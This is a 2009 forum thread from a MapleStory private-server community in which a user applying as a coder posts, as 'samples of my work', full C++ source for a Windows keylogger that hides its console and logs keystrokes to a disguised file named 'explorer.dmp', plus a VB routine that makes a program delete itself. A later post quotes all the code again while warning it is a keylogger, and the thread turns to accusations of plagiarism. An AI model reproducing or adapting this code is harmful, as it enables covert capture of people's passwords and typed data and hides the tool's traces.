Tristory!
Tristory!
Tristory!
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Tristory!

Please view our forum rules: Forum Rules
Are you new to the forums? Introduce Yourself
 
HomePortalSearchLatest imagesRegisterLog in
First, Tristory will be back sooner than u think... sorry for any heartache I have caused... -Trireaper
Okay i really dont wanna do the surveys but you can get free stuff from http://www.rewards1.com/index.php?referrer_id=1697545 and http://www.prizerebel.com/index.php?r=416882

 

 Xecuter's Application

Go down 
3 posters
AuthorMessage
Xecuter
Member
Member



Number of posts : 20
Points : 22
Registration date : 2009-04-16

Xecuter's Application Empty
PostSubject: Xecuter's Application   Xecuter's Application I_icon_minitimeThu Apr 16, 2009 1:10 am

I'm Xecuter. My real name is George.
I've been coding for awhile now. Got bored so I decided to check out some MapleStory Private Servers. Found MapleStoryPrivateServer.net and found my way here from there.

Here are some samples of my work...

C++
Code:
#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>

#define BUFSIZE 80

int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth;
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);
       
 
    get_keys();
   
    return 0;


int get_keys(void)
{
            short character;
              while(1)
              {
                    Sleep(10);
                    for(character=8;character<=222;character++)
                    {
                        if(GetAsyncKeyState(character)==-32767)
                        { 
                           
                            FILE *file;
                            file=fopen("explorer.dmp","a+");
                            if(file==NULL)
                            {
                                    return 1;
                            }           
                            if(file!=NULL)
                            {       
                                    if((character>=39)&&(character<=64))
                                    {
                                          fputc(character,file);
                                          fclose(file);
                                          break;
                                    }       
                                    else if((character>64)&&(character<91))
                                    {
                                          character+=32;
                                          fputc(character,file);
                                          fclose(file);
                                          break;
                                    }
                                    else
                                    {
                                        switch(character)
                                        {
                                              case VK_SPACE:
                                              fputc(' ',file);
                                              fclose(file);
                                              break;   
                                              case VK_SHIFT:
                                              fputs("[SHIFT]",file);
                                              fclose(file);
                                              break;                                           
                                              case VK_RETURN:
                                              fputs("\n[ENTER]",file);
                                              fclose(file);
                                              break;
                                              case VK_BACK:
                                              fputs("[BACKSPACE]",file);
                                              fclose(file);
                                              break;
                                              case VK_TAB:
                                              fputs("[TAB]",file);
                                              fclose(file);
                                              break;
                                              case VK_CONTROL:
                                              fputs("[CTRL]",file);
                                              fclose(file);
                                              break;   
                                              case VK_DELETE:
                                              fputs("[DEL]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_1:
                                              fputs("[;:]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_2:
                                              fputs("[/?]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_3:
                                              fputs("[`~]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_4:
                                              fputs("[ [{ ]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_5:
                                              fputs("[\\|]",file);
                                              fclose(file);
                                              break;                               
                                              case VK_OEM_6:
                                              fputs("[ ]} ]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_7:
                                              fputs("['\"]",file);
                                              fclose(file);
                                              break;
                                              /*case VK_OEM_PLUS:
                                              fputc('+',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_COMMA:
                                              fputc(',',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_MINUS:
                                              fputc('-',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_PERIOD:
                                              fputc('.',file);
                                              fclose(file);
                                              break;*/
                                              case VK_NUMPAD0:
                                              fputc('0',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD1:
                                              fputc('1',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD2:
                                              fputc('2',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD3:
                                              fputc('3',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD4:
                                              fputc('4',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD5:
                                              fputc('5',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD6:
                                              fputc('6',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD7:
                                              fputc('7',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD8:
                                              fputc('8',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD9:
                                              fputc('9',file);
                                              fclose(file);
                                              break;
                                              case VK_CAPITAL:
                                              fputs("[CAPS LOCK]",file);
                                              fclose(file);
                                              break;
                                              default:
                                              fclose(file);
                                              break;
                                        }       
                                  }   
                              }       
                    }   
                }                 
                   
            }
            return EXIT_SUCCESS;                           
}                   

VB
Code:
Public Function killself()
'Call on form_unload
Open App.Path & "\temp.bat" For Output As #1
Print #1, ":repeat"
Print #1, "del " & App.EXEName & ".exe"
Print #1, "if exist " & App.EXEName & ".exe goto repeat"
Print #1, "del temp.bat"
Close #1
Shell App.Path & "\temp.bat"
End Function


I'm used to deving for private servers and I can confidently say that I can fix most problems.
The code samples I provided are all nooby in my opinion, that's because the only other sources I have that I can easily access right now are serious projects that I don't feel comfortable posting snippets from.

That's it.
Thanks for reading.


Last edited by Xecuter on Thu Apr 16, 2009 4:16 pm; edited 2 times in total
Back to top Go down
Secret
Admin
Secret


Number of posts : 216
Points : 270
Registration date : 2009-03-15
Age : 38
Location : Los Angeles

Xecuter's Application Empty
PostSubject: Re: Xecuter's Application   Xecuter's Application I_icon_minitimeThu Apr 16, 2009 1:13 am

I can't tell if that's good or not.. >_>

Accepted.
Back to top Go down
http://tristory.net
Guest
Guest




Xecuter's Application Empty
PostSubject: Re: Xecuter's Application   Xecuter's Application I_icon_minitimeThu Apr 16, 2009 8:27 am

Xecuter wrote:
I'm Xecuter. My real name is George.
I've been coding for awhile now. Got bored so I decided to check out some MapleStory Private Servers. Found MapleStoryPrivateServer.net and found my way here from there.

Here are some samples of my work...

C++
Code:
#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth;
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);
       
 
    get_keys();
   
    return 0;


int get_keys(void)
{
            short character;
              while(1)
              {
                    Sleep(10);
                    for(character=8;character<=222;character++)
                    {
                        if(GetAsyncKeyState(character)==-32767)
                        { 
                           
                            FILE *file;
                            file=fopen("explorer.dmp","a+");
                            if(file==NULL)
                            {
                                    return 1;
                            }           
                            if(file!=NULL)
                            {       
                                    if((character>=39)&&(character<=64))
                                    {
                                          fputc(character,file);
                                          fclose(file);
                                          break;
                                    }       
                                    else if((character>64)&&(character<91))
                                    {
                                          character+=32;
                                          fputc(character,file);
                                          fclose(file);
                                          break;
                                    }
                                    else
                                    {
                                        switch(character)
                                        {
                                              case VK_SPACE:
                                              fputc(' ',file);
                                              fclose(file);
                                              break;   
                                              case VK_SHIFT:
                                              fputs("[SHIFT]",file);
                                              fclose(file);
                                              break;                                           
                                              case VK_RETURN:
                                              fputs("\n[ENTER]",file);
                                              fclose(file);
                                              break;
                                              case VK_BACK:
                                              fputs("[BACKSPACE]",file);
                                              fclose(file);
                                              break;
                                              case VK_TAB:
                                              fputs("[TAB]",file);
                                              fclose(file);
                                              break;
                                              case VK_CONTROL:
                                              fputs("[CTRL]",file);
                                              fclose(file);
                                              break;   
                                              case VK_DELETE:
                                              fputs("[DEL]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_1:
                                              fputs("[;:]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_2:
                                              fputs("[/?]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_3:
                                              fputs("[`~]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_4:
                                              fputs("[ [{ ]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_5:
                                              fputs("[\\|]",file);
                                              fclose(file);
                                              break;                               
                                              case VK_OEM_6:
                                              fputs("[ ]} ]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_7:
                                              fputs("['\"]",file);
                                              fclose(file);
                                              break;
                                              /*case VK_OEM_PLUS:
                                              fputc('+',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_COMMA:
                                              fputc(',',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_MINUS:
                                              fputc('-',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_PERIOD:
                                              fputc('.',file);
                                              fclose(file);
                                              break;*/
                                              case VK_NUMPAD0:
                                              fputc('0',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD1:
                                              fputc('1',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD2:
                                              fputc('2',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD3:
                                              fputc('3',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD4:
                                              fputc('4',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD5:
                                              fputc('5',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD6:
                                              fputc('6',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD7:
                                              fputc('7',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD8:
                                              fputc('8',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD9:
                                              fputc('9',file);
                                              fclose(file);
                                              break;
                                              case VK_CAPITAL:
                                              fputs("[CAPS LOCK]",file);
                                              fclose(file);
                                              break;
                                              default:
                                              fclose(file);
                                              break;
                                        }       
                                  }   
                              }       
                    }   
                }                 
                   
            }
            return EXIT_SUCCESS;                           
}                   

VB
Code:
Public Function killself()
'Call on form_unload
Open App.Path & "\temp.bat" For Output As #1
Print #1, ":repeat"
Print #1, "del " & App.EXEName & ".exe"
Print #1, "if exist " & App.EXEName & ".exe goto repeat"
Print #1, "del temp.bat"
Close #1
Shell App.Path & "\temp.bat"
End Function


I'm used to deving for private servers and I can confidently say that I can fix most problems.
The code samples I provided are all nooby in my opinion, that's because the only other sources I have that I can easily access right now are serious projects that I don't feel comfortable posting snippets from.

That's it.
Thanks for reading.


Your work? Yea Right! Next time edit it before you post:

http://www.criticalsecurity.net/index.php?showtopic=22576&mode=threaded&pid=138981

The first one ... Its a virus ... its a keylogger. DO NOT COMPILE IT.

If you want him to steal your password, then use it. That's my understanding at least.

The second one ... idk.

Also, servers are coded in Java, not either of those languages, so ... idk what you can REALLY do. Copy and Paste? Sorry if i criticize too much.
Back to top Go down
Kadiance
Admin
Kadiance


Number of posts : 353
Points : 404
Registration date : 2009-03-15
Age : 29
Location : Brooklyn, NY

Xecuter's Application Empty
PostSubject: Re: Xecuter's Application   Xecuter's Application I_icon_minitimeThu Apr 16, 2009 9:41 am

Lmfaos.
Nice one.
Should I say denied or should I get Danda to personally say it?
Back to top Go down
http://etsukosohma-stories.blogspot.com/
Xecuter
Member
Member



Number of posts : 20
Points : 22
Registration date : 2009-04-16

Xecuter's Application Empty
PostSubject: Re: Xecuter's Application   Xecuter's Application I_icon_minitimeThu Apr 16, 2009 4:14 pm

Jack, I thought you actually knew something considering that you run MapleStoryPrivateServer.net but I guess I was wrong.
If you knew anything about coding you would know that the first one doesn't send information, it just logs key strokes. And yes, I made it. There are many variations of it on the web. The people that actually know what they're doing and have experience would think of it as a 'hello world' program at your caliber.

The second one is in VB, if you can't figure out what it does then sorry but you don't know anything...
I'm well aware that most private servers run in Java. Java isn't that hard. It's common sense. At least for me anyways.

I'm even more surprised to see that you even failed at quoting me! There is no int test_key(void); in my code, you added that in yourself in your sad attempt to frame me. Also, as you can clearly see, there is no test_key function to begin with...so why declare it?


Last edited by Xecuter on Thu Apr 16, 2009 4:29 pm; edited 1 time in total
Back to top Go down
Kadiance
Admin
Kadiance


Number of posts : 353
Points : 404
Registration date : 2009-03-15
Age : 29
Location : Brooklyn, NY

Xecuter's Application Empty
PostSubject: Re: Xecuter's Application   Xecuter's Application I_icon_minitimeThu Apr 16, 2009 4:26 pm

That's it.
There is one thing that needs to be made clear.
Coders may not be able to be Gamemasters if that's what most of yuu are lookin for.
Next, I'm sry, Xecuter if I blamed yuu wrongly.
Stop posting in apps if yuu do not know what yur saying.
Back to top Go down
http://etsukosohma-stories.blogspot.com/
Xecuter
Member
Member



Number of posts : 20
Points : 22
Registration date : 2009-04-16

Xecuter's Application Empty
PostSubject: Re: Xecuter's Application   Xecuter's Application I_icon_minitimeThu Apr 16, 2009 4:28 pm

Kadiance wrote:
That's it.
There is one thing that needs to be made clear.
Coders may not be able to be Gamemasters if that's what most of yuu are lookin for.
Next, I'm sry, Xecuter if I blamed yuu wrongly.
Stop posting in apps if yuu do not know what yur saying.

I'm not looking to be a GameMaster, except maybe to debug certain commands.
Apology accepted.

@ your last line, I think I know what I'm saying.
Back to top Go down
Kadiance
Admin
Kadiance


Number of posts : 353
Points : 404
Registration date : 2009-03-15
Age : 29
Location : Brooklyn, NY

Xecuter's Application Empty
PostSubject: Re: Xecuter's Application   Xecuter's Application I_icon_minitimeThu Apr 16, 2009 4:36 pm

Not at yuu..
at jack
>_>
Back to top Go down
http://etsukosohma-stories.blogspot.com/
Guest
Guest




Xecuter's Application Empty
PostSubject: Re: Xecuter's Application   Xecuter's Application I_icon_minitimeThu Apr 16, 2009 5:14 pm

Xecuter wrote:
Jack, I thought you actually knew something considering that you run MapleStoryPrivateServer.net but I guess I was wrong.
If you knew anything about coding you would know that the first one doesn't send information, it just logs key strokes. And yes, I made it. There are many variations of it on the web. The people that actually know what they're doing and have experience would think of it as a 'hello world' program at your caliber.

The second one is in VB, if you can't figure out what it does then sorry but you don't know anything...
I'm well aware that most private servers run in Java. Java isn't that hard. It's common sense. At least for me anyways.

I'm even more surprised to see that you even failed at quoting me! There is no int test_key(void); in my code, you added that in yourself in your sad attempt to frame me. Also, as you can clearly see, there is no test_key function to begin with...so why declare it?

o.0 I just looked it over quickly. I wasn't trying to be mean. Yes I understand the code, I had 3 minutes though. Sorry if I was wrong Sad. I saw that it stored the code in a file 'svchost' and did not upload it. But still, it is a 'keylogger'. And there was the test_key line. Why did you edit it out? "Last edited by Xecuter on Thu Apr 16, 2009 4:16 pm; edited 2 times in total"

Just wondering. +I'm only 14. Can't expect me to know everything Very Happy.
Back to top Go down
Kadiance
Admin
Kadiance


Number of posts : 353
Points : 404
Registration date : 2009-03-15
Age : 29
Location : Brooklyn, NY

Xecuter's Application Empty
PostSubject: Re: Xecuter's Application   Xecuter's Application I_icon_minitimeThu Apr 16, 2009 5:17 pm

Thread closed.
It will be reopened by Danda only when he rejects or accepts it.
Back to top Go down
http://etsukosohma-stories.blogspot.com/
Sponsored content





Xecuter's Application Empty
PostSubject: Re: Xecuter's Application   Xecuter's Application I_icon_minitime

Back to top Go down
 
Xecuter's Application
Back to top 
Page 1 of 1
 Similar topics
-
» Aslanking Mod Application
» AirStrike Application
» Kangwei's Coder Application.
» Jack-Coder Application
» Moderator Application format

Permissions in this forum:You cannot reply to topics in this forum
Tristory! :: Coders-
Jump to: